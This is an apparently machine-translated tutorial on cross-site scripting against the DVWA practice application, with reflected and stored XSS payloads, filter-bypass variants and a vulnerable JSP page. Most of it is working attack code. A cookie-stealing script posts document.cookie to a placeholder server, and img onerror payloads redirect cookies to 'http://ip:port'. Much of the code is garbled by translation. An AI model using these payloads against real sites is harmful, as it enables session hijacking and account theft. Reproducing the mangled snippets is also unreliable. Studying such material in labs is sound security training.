brief introduction
XSS attack is called cross site scripting attack. It is not confused with the abbreviation of cascading style sheets (CSS). Therefore, XSS is abbreviated as XSS. XSS is a kind of computer security vulnerability in web applications, which allows malicious web users to embed code into pages provided for other users.
The harm of
XSS attack includes
1. Steal all kinds of user accounts, such as machine login account, user online banking account, various administrator accounts
2. Control enterprise data, including the ability to read, tamper, add, and delete enterprise sensitive data
3. Stealing important commercial materials of enterprises
4. Illegal transfer
5. Force email
6. Website hanging horse
7. Control the victim machine to launch attacks on other websites
Reflected type
The parameters passed in to the page will be displayed on the page exactly, and the browser security settings can execute unsafe scripts.
Low level
hold http://127.0.0.1/dvwa/vulnerabilities/xss_ D /? Default = English parameter English is replaced by
<script>alert('hack')</script>
Enter, cross site script attack successful
Using XSS to get user cookie
Since the script tag can load and execute the JavaScript code of the remote server, it is written under its own server cookie.js 。
to write cookie.js
Using DOM to generate forms and submit them is not recommended
document.write ("< form action = < http: / / server IP / project / cookie accepting interface 'name ='exploit' method ='post 'style = display:none '>");
document.write ("<input type='hidden' name='data' value='"+ document.cookie +"'>");
document.write ("</form>");
/ / console.info ('xss-dom: '+ document.cookie );
document.exploit.submit ();
Httprequest with JS
Var httprequest = new xmlhttprequest(); / / step 1: create the required objects
httpRequest.open ('POST', ' http://ip : port / interface path ', true); / / step 2: open the connection
httpRequest.setRequestHeader ("content type", "application / x-www-form-urlencoded"); / / set the request header. Note: the request header must be set in the post mode (set the request header after the connection is established)
/ / console.info ('xss-dom: '+ document.cookie );
httpRequest.send ('data='+ document.cookie ); / / send the request and write the request body in send
* *
*Processing program after data acquisition
* /
httpRequest.onreadystatechange =Function() {/ / the callback interface after the request, which can write the program to be executed after the request is successful
if ( httpRequest.readyState == 4 && httpRequest.status ==200) {/ / verify that the request was sent successfully
var json = httpRequest.responseText ; / / get the data returned by the server
/ / console.log (json);
}
}
The function of this JS code is to construct a hidden form and a hidden field in the page, with the content of the current cookie, and send it to your interface by post
use cookie.js
Next, insert it where there is an XSS vulnerability.
hold http://127.0.0.1/dvwa/vulnerabilities/xss_ D /? Default = English parameter English is replaced by
< script SRC = http: / / server IP / Project path/ cookie.js ></script>
Medium level
Filter < script > tags, change < script > to < SCR < script > IPT > or < script > on a low level basis
<scr<script>ipt>alert("xss")</script>
<SCRIPT>alert("xss")</SCRIPT>
Height level
When you have the letters script at the same time, you can't use script cookie.js Take out the content of the sending request in the. If an error occurs in loading a nonexistent image, the JavaScript onerror event will be triggered, and the request will be written in onerror.
<img SrC=# oneRror=( locatIon.href= " http://ip :port/cookieinf?data="+ documenT.cookie >
Pay attention to the inserted code. The uppercase part actually forms a script, so it conforms to the regularity of the code, so it is filtered out. The I in the inserted code is HTML coded - ා x69;
<img src=# onerror=(locati on.href= " http://ip :port/cookieinf?data="+ document.cookie >
Store type
The same as the reflect type, except that this type is first stored in the database until the data is displayed. The stored script will be executed
<script> document.write ('<img src=" http://ip :port/getcookie?cookie='+ document.cookie +'" height=0 border=0 />');</script>
Low level
Burp can be used to bypass length verification
Medium level
1. Use double write bypass, input < SCR < script > IPT > alert( document.cookie )</script>
2. Use case bypass and enter < script > alert( document.cookie )</script>
Other, such as imalerc = 3( document.cookie >
Height level
<IMG src=1 onerror=alert( document.cookie >
Jsp code of XSS
When the parameters accepted by JSP are processed by the server, they are displayed on the page in their original form, and the browser security is set to enable ActiveX that is not marked as safe to execute scripts.
The code is as follows
<%@ page language="java" import=" java.util .*" pageEncoding="UTF-8"%>
%
String path = request.getContextPath ();
String basePath = request.getScheme ()+"://"+ request.getServerName ()+":"+ request.getServerPort ()+path+"/";
% >
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<base href="<%=basePath%>">
<title>My JSP ' index.jsp ' starting page</title>
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
<meta http-equiv="description" content="This is my page">
</head>
<body>
<div style="margin: 0 auto">
%
//Set encoding
request.setCharacterEncoding ("UTF-8");
//Incoming user value
String tmp = request.getParameter ("opr");
//Is the deceleration input value empty
if(tmp == null){
out.print ("the value is null");
}else{
//Transcoding
String opr = new String( tmp.getBytes ("ISO-8859-1"),"utf-8");
/*Output the value passed in to the page*/
out.print (opr);
}
% >
I am the content
</div>
</body>
</html>
At this time, when the parameter OPR of JSP is < script > < / script >, the code will be output to the page and the browser will execute it automatically.
